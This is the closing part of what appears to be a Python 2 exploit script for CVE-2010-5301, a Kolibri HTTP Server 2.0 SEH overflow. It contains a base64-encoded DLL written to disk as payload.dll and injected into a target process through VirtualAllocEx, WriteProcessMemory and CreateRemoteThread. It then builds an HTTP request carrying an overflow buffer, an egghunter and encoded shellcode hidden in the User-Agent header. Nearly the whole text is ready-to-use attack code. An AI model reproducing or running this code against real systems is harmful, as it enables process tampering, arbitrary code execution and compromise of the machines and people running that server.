AAAC5kYXRhAAAAJAAAAAIAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5ic3MAAAAAhAAAAAQAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5pZGF0YSQ0jAAAAAYAAAADAQQAAAAAAAAAAAAAAAAAAAAAAC5pZGF0YSQ14AAAAAYAAAADAQQAAAAAAAAAAAAAAAAAAAAAAC5pZGF0YSQ3GAIAAAYAAAADAQsAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA6AkAAAEAAAADAC5kYXRhAAAAJAAAAAIAAAADAC5ic3MAAAAAhAAAAAQAAAADAC5pZGF0YSQ3zAEAAAYAAAADAC5pZGF0YSQ1oAAAAAYAAAADAC5pZGF0YSQ0TAAAAAYAAAADAC5pZGF0YSQ2HgEAAAYAAAADAC50ZXh0AAAA8AkAAAEAAAADAC5kYXRhAAAAJAAAAAIAAAADAC5ic3MAAAAAhAAAAAQAAAADAC5pZGF0YSQ3yAEAAAYAAAADAC5pZGF0YSQ1nAAAAAYAAAADAC5pZGF0YSQ0SAAAAAYAAAADAC5pZGF0YSQ2DAEAAAYAAAADAC5maWxlAAAAFQEAAP7/AABnAWZha2UAAAAAAAAAAAAAAAAAAGhuYW1lAAAAPAAAAAYAAAADAGZ0aHVuawAAkAAAAAYAAAADAC50ZXh0AAAA+AkAAAEAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5kYXRhAAAAJAAAAAIAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5ic3MAAAAAhAAAAAQAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5pZGF0YSQyAAAAAAYAAAADARQAAAADAAAAAAAAAAAAAAAAAC5pZGF0YSQ0PAAAAAYAAAADAC5pZGF0YSQ1kAAAAAYAAAADAC5maWxlAAAAIwEAAP7/AABnAWZha2UAAAAAAAAAAAAAAAAAAC50ZXh0AAAA+AkAAAEAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5kYXRhAAAAJAAAAAIAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5ic3MAAAAAhAAAAAQAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5pZGF0YSQ0UAAAAAYAAAADAQQAAAAAAAAAAAAAAAAAAAAAAC5pZGF0YSQ1pAAAAAYAAAADAQQAAAAAAAAAAAAAAAAAAAAAAC5pZGF0YSQ30AEAAAYAAAADAQ0AAAAAAAAAAAAAAAAAAAAAAC5maWxlAAAARAEAAP7/AABnAWNydHN0dWZmLmMAAAAAAAAAAAAAAACnAgAA+AkAAAEAIAADAQAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA+AkAAAEAAAADAQkAAAABAAAAAAAAAAAAAAAAAC5kYXRhAAAAJAAAAAIAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5ic3MAAAAAhAAAAAQAAAADAQAAAAAAAAAAAAAAAAAAAAAAAC5jdG9ycwAADAoAAAEAAAADAQQAAAABAAAAAAAAAAAAAAAAAC50ZXh0AAAAAAAAAAAAAAADAC5kYXRhAAAAJAAAAAIAAAADAC5ic3MAAAAAhAAAAAQAAAADAC5pZGF0YSQ3xAEAAAYAAAADAC5pZGF0YSQ1mAAAAAYAAAADAC5pZGF0YSQ0RAAAAAYAAAADAC5pZGF0YSQ2/AAAAAYAAAADAC50ZXh0AAAAAAAAAAAAAAADAC5kYXRhAAAAJAAAAAIAAAADAC5ic3MAAAAAhAAAAAQAAAADAC5pZGF0YSQ3wAEAAAYAAAADAC5pZGF0YSQ1lAAAAAYAAAADAC5pZGF0YSQ0QAAAAAYAAAADAC5pZGF0YSQ28AAAAAYAAAADAC50ZXh0AAAAAAAAAAAAAAADAC5kYXRhAAAAJAAAAAIAAAADAC5ic3MAAAAAhAAAAAQAAAADAC5pZGF0YSQ3vAEAAAYAAAADAC5pZGF0YSQ1kAAAAAYAAAADAC5pZGF0YSQ0PAAAAAYAAAADAC5pZGF0YSQ25AAAAAYAAAADAAAAAAC5AgAA8AkAAAEAIAACAAAAAADMAgAApAEAAAMAAAACAAAAAADrAgAAAAAAAAIAAAACAAAAAAD6AgAAFAoAAAEAAAACAF9mcmVlAAAAiAkAAAEAIAACAAAAAAAJAwAAnAAAAAYAAAACAAAAAAAiAwAAhAAAAAQAAAACAAAAAAA9AwAAoAAAAAYAAAACAAAAAABUAwAAAAAAAAAAAAACAAAAAABjAwAAGAIAAAYAAAACAAAAAAB3AwAAlAAAAAYAAAACAF9fZXJybm8AoAkAAAEAIAACAAAAAACKAwAAuAAAAAYAAAACAAAAAACXAwAAAAAAAP//AAACAAAAAACvAwAAABAAAP//AAACAAAAAADIAwAAAAAgAP//AAACAAAAAADiAwAABAAAAP//AAACAAAAAAD+AwAAAAAAAAAAAAACAAAAAAAQBAAAAAAAAP//AAACAAAAAAAcBAAAAAAAAAAAAAACAAAAAAAuBAAAAAAAAAAAAAACAAAAAAA+BAAA6AkAAAEAIAACAAAAAABPBAAAtAAAAAYAAAACAAAAAABbBAAAAAAAAAQAAAACAAAAAABpBAAApAEAAAMAAAACAAAAAACMBAAAABAAAP//AAACAAAAAACkBAAAsAAAAAYAAAACAAAAAACyBAAAAAAAAAAAAAACAAAAAADEBAAAAAAAAAAAAAACAF9fZGxsX18AAAAAAP//AAACAAAAAADUBAAAAAAAAP//AAACAF9md3JpdGUAuAkAAAEAIAACAAAAAADpBAAAFAAAAAYAAAACAAAAAAD8BAAAAABQYv//AAACAAAAAAALBQAAABAAAP//AAACAF9tZW1jcHkA0AkAAAEAIAACAAAAAAAhBQAApAEAAAMAAAACAF9tZW1zZXQA4AkAAAEAIAACAAAAAAA/BQAAJAAAAAIAAAACAAAAAABMBQAAlAAAAAQAAAACAAAAAABdBQAACAoAAAEAAAACAF9mZmx1c2gAkAkAAAEAIAACAAAAAABrBQAA1AAAAAQAAAACAAAAAAB3BQAAAAAAAAAAAAACAAAAAACHBQAAAAAAAAAAAAACAAAAAACZBQAACAoAAAEAAAACAAAAAACoBQAAmAAAAAYAAAACAAAAAAC/BQAAqAAAAAYAAAACAAAAAADSBQAAzAAAAAYAAAACAAAAAADgBQAAAAIAAP//AAACAAAAAADzBQAAyAAAAAYAAAACAAAAAAABBgAABAAAAP//AAACAF9fZW5kX18AAAAAAAAAAAACAAAAAAAWBgAArAAAAAYAAAACAAAAAAAlBgAAgAkAAAEAIAACAF9tYWxsb2MAmAkAAAEAIAACAAAAAAAyBgAAFAoAAAEAAAACAF9zdHJjcHkAqAkAAAEAIAACAAAAAABABgAA0AAAAAYAAAACAAAAAABOBgAAAAAQAP//AAACAAAAAABnBgAAAAAAAAAAAAACAAAAAAB5BgAAAABQYv//AAACAAAAAACGBgAAAwAAAP//AAACAAAAAACUBgAAvAAAAAYAAAACAAAAAACiBgAA2AAAAAYAAAACAF9hYm9ydAAAyAkAAAEAIAACAAAAAACwBgAApAAAAAQAAAACAAAAAADMBgAAAAAAAAAAAAACAAAAAADZBgAAwAAAAAYAAAACAAAAAADlBgAAAQAAAP//AAACAAAAAAD9BgAAAAAAAP//AAACAAAAAAAOBwAA1AAAAAYAAAACAAAAAAAcBwAAkAAAAAYAAAACAAAAAAAuBwAAAAAAAAYAAAACAAAAAABDBwAAAAAAAP//AAACAAAAAABfBwAAAAAAAP//AAACAAAAAAB3BwAA3AAAAAYAAAACAAAAAACHBwAAAAAAAP//AAACAF9wcmludGYAsAkAAAEAIAACAF9fYXNzZXJ02AkAAAEAIAACAAAAAACUBwAAAAAAAP//AAACAAAAAAClBwAApAEAAAMAAAACAAAAAADHBwAA0AEAAAYAAAACAAAAAADdBwAAAAAAAAAAAAACAAAAAADtBwAAwAkAAAEAIAACAAAAAAD3BwAAxAAAAAYAAAACAAUIAABfbmV4dF9hdGV4aXQAX2ZpcnN0X2F0ZXhpdABfX19kbGxfZXhpdABfRGxsTWFpbkNSVFN0YXJ0dXBAMTIAX19fZG9fc2psal9pbml0AF9Fc3NlbnRpYWxGdW5jMQBfRXNzZW50aWFsRnVuYzIAX0Vzc2VudGlhbEZ1bmMzAF9Fc3NlbnRpYWxGdW5jNABfRXNzZW50aWFsRnVuYzUAX0Vzc2VudGlhbEZ1bmM2AF9Fc3NlbnRpYWxGdW5jNwBfRXNzZW50aWFsRnVuYzgAX0Vzc2VudGlhbEZ1bmM5AF9Fc3NlbnRpYWxGdW5jMTAAX0Vzc2VudGlhbEZ1bmMxMQBfRXNzZW50aWFsRnVuYzEyAF9Fc3NlbnRpYWxGdW5jMTMAX0Vzc2VudGlhbEZ1bmMxNABfX19yZXBvcnRfZXJyb3IAX19fd3JpdGVfbWVtb3J5AF9fcGVpMzg2X3J1bnRpbWVfcmVsb2NhdG9yAF93YXNfaW5pdC4zMTA4MABfX19kb19nbG9iYWxfZHRvcnMAX19fZG9fZ2xvYmFsX2N0b3JzAF9pbml0aWFsaXplZABfRGxsTWFpbkAxMgBwc2V1ZG8tcmVsb2MtbGlzdC5jAF93MzJfYXRvbV9zdWZmaXgAX19fdzMyX3NoYXJlZHB0cl9kZWZhdWx0X3VuZXhwZWN0ZWQAX19fdzMyX3NoYXJlZHB0cl9nZXQAZHcyX29iamVjdF9tdXRleC4wAGR3Ml9vbmNlLjEAc2psX2ZjX2tleS4yAHNqbF9vbmNlLjMAZWhfZ2xvYmFsc19zdGF0aWMuNABlaF9nbG9iYWxzX2tleS41AGVoX2dsb2JhbHNfb25jZS42AF9fX3czMl9zaGFyZWRwdHJfaW5pdGlhbGl6ZQBfX19zamxqX2luaXRfY3RvcgBfVmlydHVhbFByb3RlY3RAMTYAX19fUlVOVElNRV9QU0VVRE9fUkVMT0NfTElTVF9fAF9fZGF0YV9zdGFydF9fAF9fX0RUT1JfTElTVF9fAF9faW1wX19WaXJ0dWFsUHJvdGVjdEAxNgBfX193MzJfc2hhcmVkcHRyX3Rlcm1pbmF0ZQBfX2ltcF9fVmlydHVhbFF1ZXJ5QDEyAF9fX3Rsc19zdGFydF9fAF9fbGlibXN2Y3J0X2FfaW5hbWUAX19pbXBfX0ZpbmRBdG9tQUA0AF9faW1wX19hYm9ydABfX2RsbF9jaGFyYWN0ZXJpc3RpY3NfXwBfX3NpemVfb2Zfc3RhY2tfY29tbWl0X18AX19zaXplX29mX3N0YWNrX3Jlc2VydmVfXwBfX21ham9yX3N1YnN5c3RlbV92ZXJzaW9uX18AX19fY3J0X3hsX3N0YXJ0X18AX0FkZEF0b21BQDQAX19fY3J0X3hpX3N0YXJ0X18AX19fY3J0X3hpX2VuZF9fAF9WaXJ0dWFsUXVlcnlAMTIAX19pbXBfX19pb2IAX19ic3Nfc3RhcnRfXwBfX19SVU5USU1FX1BTRVVET19SRUxPQ19MSVNUX0VORF9fAF9fc2l6ZV9vZl9oZWFwX2NvbW1pdF9fAF9faW1wX19fZXJybm8AX19fY3J0X3hwX3N0YXJ0X18AX19fY3J0X3hwX2VuZF9fAF9fbWlub3Jfb3NfdmVyc2lvbl9fAF9faGVhZF9saWJtc3ZjcnRfYQBfX2ltYWdlX2Jhc2VfXwBfX3NlY3Rpb25fYWxpZ25tZW50X18AX19SVU5USU1FX1BTRVVET19SRUxPQ19MSVNUX18AX19kYXRhX2VuZF9fAF9fX3czMl9zaGFyZWRwdHIAX19DVE9SX0xJU1RfXwBfX2Jzc19lbmRfXwBfX19jcnRfeGNfZW5kX18AX19fY3J0X3hjX3N0YXJ0X18AX19fQ1RPUl9MSVNUX18AX19pbXBfX0dldEF0b21OYW1lQUAxMgBfX2ltcF9fX19kbGxvbmV4aXQAX19pbXBfX21lbWNweQBfX2ZpbGVfYWxpZ25tZW50X18AX19pbXBfX21hbGxvYwBfX21ham9yX29zX3ZlcnNpb25fXwBfX2ltcF9fX2Fzc2VydABfX19kbGxvbmV4aXQAX19EVE9SX0xJU1RfXwBfX2ltcF9fbWVtc2V0AF9fc2l6ZV9vZl9oZWFwX3Jlc2VydmVfXwBfX19jcnRfeHRfc3RhcnRfXwBfX19JbWFnZUJhc2UAX19zdWJzeXN0ZW1fXwBfX2ltcF9fZmZsdXNoAF9faW1wX19zdHJjcHkAX19fdzMyX3NoYXJlZHB0cl91bmV4cGVjdGVkAF9fX3Rsc19lbmRfXwBfX2ltcF9fZnJlZQBfX21ham9yX2ltYWdlX3ZlcnNpb25fXwBfX2xvYWRlcl9mbGFnc19fAF9faW1wX19wcmludGYAX19pbXBfX0FkZEF0b21BQDQAX19oZWFkX2xpYmtlcm5lbDMyX2EAX19taW5vcl9zdWJzeXN0ZW1fdmVyc2lvbl9fAF9fbWlub3JfaW1hZ2VfdmVyc2lvbl9fAF9faW1wX192ZnByaW50ZgBfRmluZEF0b21BQDQAX0dldEF0b21OYW1lQUAxMgBfX1JVTlRJTUVfUFNFVURPX1JFTE9DX0xJU1RfRU5EX18AX19saWJrZXJuZWwzMl9hX2luYW1lAF9fX2NydF94dF9lbmRfXwBfdmZwcmludGYAX19pbXBfX2Z3cml0ZQA="
	
        bytes = b64decode(b64_dll)
        generate = open("payload.dll", "wb")
        generate.write(bytes)
        generate.close()
        dll_injection(PID)


def dll_injection(PID):


	# Attempting dll injection

        print "[+] Initiating dll injection phase"
        sleep(2)
        dll_name = "payload.dll"


        
        hProcess = windll.kernel32.OpenProcess(

                983040 | 1048576 | 4095, False, int(PID)	                                # PROCESS_ALL_ACCESS, bInheritHandle --> False, dwProcessId --> PID

                )

        lpBaseAddress = windll.kernel32.VirtualAllocEx(

                hProcess, 0, len(dll_name), 4096 | 8192, 4 	                                # hProcess, lpAddess --> 0, dwSize --> length of the dll, flAllocationType --> MEM_COMMIT | MEM_RESERVE, flProtect --> PAGE_READWRITE

                )

        write_memory = windll.kernel32.WriteProcessMemory(

                hProcess, lpBaseAddress, dll_name, len(dll_name), byref(c_int(0))	        # hProcess, lpBaseAddress, lpshellcodefer --> payload.dll, nSize --> length of the .dll, *lpNumberOfBytesWritten --> 0

                )

        execute = windll.kernel32.CreateRemoteThread(

                hProcess, None, 0, windll.kernel32.GetProcAddress(
		
                        windll.kernel32.GetModuleHandleA("kernel32.dll"), "LoadLibraryA"	# hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId

                        ), 
                lpBaseAddress, 0, byref(c_ulong(0)),

                )

        sleep(2)
        exploit()


def exploit():
    
    print "[+] Triggering..."
    sleep(1)
    
    shellcode = "\x29\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    shellcode += "\x60\xd0\x19\x98\x83\xee\xfc\xe2\xf4\x9c\x38\x9b\x98\x60\xd0"
    shellcode += "\x79\x11\x85\xe1\xd9\xfc\xeb\x80\x29\x13\x32\xdc\x92\xca\x74"
    shellcode += "\x5b\x6b\xb0\x6f\x67\x53\xbe\x51\x2f\xb5\xa4\x01\xac\x1b\xb4"
    shellcode += "\x40\x11\xd6\x95\x61\x17\xfb\x6a\x32\x87\x92\xca\x70\x5b\x53"
    shellcode += "\xa4\xeb\x9c\x08\xe0\x83\x98\x18\x49\x31\x5b\x40\xb8\x61\x03"
    shellcode += "\x92\xd1\x78\x33\x23\xd1\xeb\xe4\x92\x99\xb6\xe1\xe6\x34\xa1"
    shellcode += "\x1f\x14\x99\xa7\xe8\xf9\xed\x96\xd3\x64\x60\x5b\xad\x3d\xed"
    shellcode += "\x84\x88\x92\xc0\x44\xd1\xca\xfe\xeb\xdc\x52\x13\x38\xcc\x18"
    shellcode += "\x4b\xeb\xd4\x92\x99\xb0\x59\x5d\xbc\x44\x8b\x42\xf9\x39\x8a"
    shellcode += "\x48\x67\x80\x8f\x46\xc2\xeb\xc2\xf2\x15\x3d\xba\x18\x15\xe5"
    shellcode += "\x62\x19\x98\x60\x80\x71\xa9\xeb\xbf\x9e\x67\xb5\x6b\xe9\x2d"
    shellcode += "\xc2\x86\x71\x3e\xf5\x6d\x84\x67\xb5\xec\x1f\xe4\x6a\x50\xe2"
    shellcode += "\x78\x15\xd5\xa2\xdf\x73\xa2\x76\xf2\x60\x83\xe6\x4d\x03\xb1"
    shellcode += "\x75\xfb\x4e\xb5\x61\xfd\x60\xd0\x19\x98"

    egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

    payload = "A"*586
    payload += struct.pack("<I", 0x909006eb)
    payload += struct.pack("<I", 0x6250120b)    # POP ECX - POP ECX - RET (injected .dll)
    payload += "\x90"*16
    payload += egghunter
    payload += "A"*(1000-len(payload))

                                                # preparing payload request
    request = (
            "HEAD /" + payload + " HTTP/1.1\r\n"
            "Host: 127.0.0.1:8080\r\n"
            "User-Agent: " + "w00tw00t" + shellcode + "\r\n"
            "Keep-Alive: 115\r\n"
            "Connection: keep-alive\r\n\r\n"
            )

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("127.0.0.1", 8080))
        s.send(request)
        s.close()

    except:
        print "[-] Error connecting to the target... Exiting"
        sleep(1)
        sys.exit()


def main():

        # Selecting PID
        global PID

        if len(sys.argv) > 1:
                
                PID = sys.argv[1]
                banner = "CVE-2010-5301 - Kolibri HTTP Server v2.0 SEH Overflow with Arbitrary DLL Injection\n"
                print banner
        
                print "[+] Selected PID is {}".format(PID)
                dropping_dll()

        else:

                print "Usage: python {} <PID>".format(sys.argv[0])
                sys.exit()



if __name__ == "__main__":
        main()